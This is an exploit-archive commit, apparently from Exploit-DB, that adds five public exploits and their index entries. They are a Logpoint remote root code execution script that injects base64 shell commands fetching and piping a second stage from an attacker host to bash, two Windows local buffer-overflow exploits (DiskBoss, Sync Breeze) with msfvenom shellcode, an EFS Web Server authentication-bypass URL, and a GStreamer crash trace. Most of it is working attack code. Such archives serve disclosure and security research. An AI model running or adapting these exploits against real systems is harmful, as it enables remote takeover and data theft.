DB: 2017-06-13

5 new exploits GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution Easy File Sharing Web Server 7.2 - Authentication Bypass
2017-06-13 05:01:23 +00:00 · 2017-06-13 05:01:23 +00:00 · 117f75fdfc
commit 117f75fdfc
parent dea52f68f5
6 changed files with 329 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5539,6 +5539,7 @@ id,file,description,date,author,platform,type,port
 42144,platforms/linux/dos/42144.py,"Mapscrn 2.03 - Local Buffer Overflow",2017-06-09,"Juan Sacco",linux,dos,0
 42147,platforms/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
 42148,platforms/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
 42162,platforms/linux/dos/42162.txt,"GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference",2017-06-12,"Hanno Boeck",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9045,6 +9046,8 @@ id,file,description,date,author,platform,type,port
 42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0
 42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0
 42157,platforms/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local,0
 42160,platforms/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15586,6 +15589,8 @@ id,file,description,date,author,platform,type,port
 42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0
 42152,platforms/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",multiple,remote,0
 42155,platforms/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote,0
 42158,platforms/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,linux,remote,0
 42159,platforms/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
--- a/platforms/linux/dos/42162.txt
+++ b/platforms/linux/dos/42162.txt
@ -0,0 +1,37 @@
 Source: https://bugzilla.gnome.org/show_bug.cgi?id=775120
 The attached file will cause a null pointer access and segfault in the mpegts parser. Current git code, found with afl.
 ASAN stack trace:
 =================================================================
 ==32545==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe957185495 bp 0x60200002cf7a sp 0x7fe956e027a0 T2)
 ==32545==The signal is caused by a WRITE memory access.
 ==32545==Hint: address points to the zero page.
    #0 0x7fe957185494 in _parse_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32
    #1 0x7fe957184058 in __common_section_checks /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:166:9
    #2 0x7fe95718522f in gst_mpegts_section_get_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:480:9
    #3 0x7fe957438b9a in mpegts_base_apply_pat /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:942:20
    #4 0x7fe957438b9a in mpegts_base_handle_psi /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1155
    #5 0x7fe957437cd1 in mpegts_base_chain /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1424:11
    #6 0x7fe9574341e7 in mpegts_base_loop /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1589:13
    #7 0x7fe9644305c3 in gst_task_func /f/gstreamer/gstreamer/gst/gsttask.c:334:5
    #8 0x7fe96362f867  (/usr/lib64/libglib-2.0.so.0+0x70867)
    #9 0x7fe96362eed4  (/usr/lib64/libglib-2.0.so.0+0x6fed4)
    #10 0x7fe9630ac443 in start_thread (/lib64/libpthread.so.0+0x7443)
    #11 0x7fe962bdb92c in clone (/lib64/libc.so.6+0xe792c)
 AddressSanitizer can not provide additional info.
 SUMMARY: AddressSanitizer: SEGV /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32 in _parse_pat
 Thread T2 (tsdemux0:sink) created by T1 (typefind:sink) here:
    #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
    #1 0x7fe96364cadf  (/usr/lib64/libglib-2.0.so.0+0x8dadf)
 Thread T1 (typefind:sink) created by T0 here:
    #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
    #1 0x7fe96364cadf  (/usr/lib64/libglib-2.0.so.0+0x8dadf)
 ==32545==ABORTING
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42162.zip
--- a/platforms/linux/remote/42158.py
+++ b/platforms/linux/remote/42158.py
@ -0,0 +1,62 @@
 # Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
 # Date: 11/06/17
 # Exploit Author: agix
 # Vendor Homepage: https://www.logpoint.com
 # Version: logpoint < 5.6.4
 # Tested on: 5.6.2
 # Vendor contact 19/04
 # Exploit details sent to the vendor 24/04
 # Patch in test mode 05/05
 # Patch release to public 08/05
 # run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e
 # to get root code execution this is the second stage e
 # wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
 # it downloads a third stage executed as root
 import time
 import zmq
 import sys
 import json
 import random
 import string
 import base64
 ATTACKER_IP = '172.16.171.1'
 LOGPOINT_IP = '172.16.171.204'
 def crash():
    context = zmq.Context()
    sock = context.socket(zmq.DEALER)
    sock.connect("tcp://%s:5504"%LOGPOINT_IP)
    sock.send('crash')
 crash()
 time.sleep(1)
 context = zmq.Context()
 sock2 = context.socket(zmq.DEALER)
 sock2.connect("tcp://%s:5504"%LOGPOINT_IP)
 name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
 cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
 cmd2 = base64.b64encode('cat /tmp/e')
 exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)
 tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
 print tosend
 sock2.send(tosend)
 print sock2.recv()
 time.sleep(30)
 # cleaning
 tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
 print tosend
 sock2.send(tosend)
 print sock2.recv()
--- a/platforms/windows/local/42160.py
+++ b/platforms/windows/local/42160.py
@ -0,0 +1,78 @@
 #!/usr/bin/python
 ###############################################################################
 # Exploit Title:  DiskBoss v8.0.16 - Local Buffer Overflow
 # Date: 11-06-2017
 # Exploit Author: @abatchy17 -- www.abatchy.com
 # Vulnerable Software: DiskBoss v8.0.16 (Freeware, Pro and Ultimate)
 # Vendor Homepage:    http://www.disksorter.com/    
 # Version: 8.0.16
 # Software Link:      http://www.diskboss.com/downloads.html (Freeware, Pro and Ultimate)
 # Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
 #
 # To trigger the exploit, click "Search" -> second (+) sign -> "Add Input Directory" and paste the content of exploit.txt
 #
 # Only difference between this one and 42157 is that EBX is used
 #
 #  Note: No typos!!11!
 #
 ##############################################################################
 a = open("exploit.txt", "w")
 # Message=  0x65182c15 : jmp ebx | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\DiskBoss\bin\QtGui4.dll)
 jmpebx = "\x15\x2c\x18\x65" # Why JMP EBX? Buffer at ESP is split, bad!
 badchars = "\x0a\x0d\x2f"
 # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
 buf =  ""
 buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
 buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
 buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
 buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
 buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
 buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
 buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
 buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
 buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
 buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
 buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
 buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
 buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
 buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
 buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
 buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
 buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
 buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
 buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
 buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
 buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
 buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
 buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
 buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
 buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
 buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
 buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
 buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
 buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
 buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
 buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
 buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
 buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
 buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
 llamaleftovers = (
    "\x53"  # push EBX
    "\x58"  # pop EAX
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBX + 233, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
    )
 junk = "\x53\x5b" * 119 + "\x53"
 data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4) + llamaleftovers + junk + buf
 a.write(data)
 a.close()
--- a/platforms/windows/local/42161.py
+++ b/platforms/windows/local/42161.py
@ -0,0 +1,79 @@
 #!/usr/bin/python
 ###############################################################################
 # Exploit Title:        Sync Breeze v9.7.26 - Local Buffer Overflow
 # Date:                 11-06-2017
 # Exploit Author:       @abatchy17 -- www.abatchy.com
 # Vulnerable Software:  Sync Breeze v9.7.26 (Freeware, Pro and Ultimate)
 # Vendor Homepage:      http://www.syncbreeze.com   
 # Version:              9.7.26
 # Software Link:        http://www.syncbreeze.com/downloads.html (Freeware, Pro and Ultimate)
 # Tested On:            Windows XP SP3 (x86), Win7 SP1 (x86)
 #
 # To trigger the exploit:
 #   1. click "Add"
 #   2. enter any command name
 #   3. On new window, scroll down to "Exclude"
 #   4. Click "Add Exclude Directory"
 #   4. Paste text in exploit.txt into "Directory" field
 #
 ##############################################################################
 a = open("exploit.txt", "w")
 # Message=  0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Sync Breeze\bin\QtGui4.dll)
 jmpesp = "\x4e\x21\x1f\x65"
 badchars = "\x0a\x0d" # And 0x80 to 0xff
 # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d"
 buf =  ""
 buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
 buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
 buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
 buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
 buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
 buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
 buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
 buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
 buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
 buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
 buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
 buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
 buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
 buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
 buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
 buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
 buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
 buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
 buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
 buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
 buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
 buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
 buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
 buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
 buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
 buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
 buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
 buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
 buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
 buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
 buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
 buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
 buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
 buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
 junk = "C" * (239)
 llamaleftovers = (
    "\x54"  # push ESP
    "\x58"  # pop EAX
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = old ESP + 0x100, shellcode generated should start exactly here as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
    )
 data = "A"*4108 + jmpesp + llamaleftovers + junk + buf
 a.write(data)
 a.close()
--- a/platforms/windows/remote/42159.txt
+++ b/platforms/windows/remote/42159.txt
@ -0,0 +1,68 @@
 # Exploit Title: EFS Web Server 7.2 Authentication Bypass
 # Date: 11-06-2017
 # Software Link: http://www.sharing-file.com/efssetup.exe
 # Software Version : 7.2
 # Exploit Author: Touhid M.Shaikh
 # Contact: http://twitter.com/touhidshaikh22
 # Website: http://touhidshaikh.com/
 ######## Description ########
 <!--
    What is Easy File Sharing Web Server 7.2 ?
    Easy File Sharing Web Server is a file sharing software that allows
 visitors to upload/download files easily through a Web Browser. It can help
 you share files with your friends and colleagues. They can download files
 from your computer or upload files from theirs.They will not be required to
 install this software or any other software because an internet browser is
 enough. Easy File Sharing Web Server also provides a Bulletin Board System
 (Forum). It allows remote users to post messages and files to the forum.
 The Secure Edition adds support for SSL encryption that helps protect
 businesses against site spoofing and data corruption.
 -->
 ######## Video PoC and Article ########
 https://www.youtube.com/watch?v=XlTH7Fm1m1w
 http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/
 ######## Attact Description  ########
 <!--
 Note: No Need to Login...bcz this is auth bypass vulnerability .hehehe.
 ==>START<==
 Any visitor..
 We can Bypass the Login Screen by just Change the URL and Browse the
 Drives.
 bingoo...
 -->
 ######## Proof of Concept ########
 When we visit the EFS web server its prompt for login, now attacker just
 change url to below.
 Exploit....
 http://192.168.1.14/disk_c/
 in this case change drvie by just change /disk_c to /disk_<Drive latter>
 example. /disk_d , /disk_f etc
 =============================================
 NOTE :: ::
 Now We have Permission to View Drives and Folder and Download Files. in
 Diffrent Drives or folder.
 ============================================
 _____ ___  _   _ _   _ ___ ____
 |_   _/ _ \| | | | | | |_ _|  _ \
  | || | | | | | | |_| || || | | |
  | || |_| | |_| |  _  || || |_| |
  |_| \___/ \___/|_| |_|___|____/
 Touhid Shaikh.......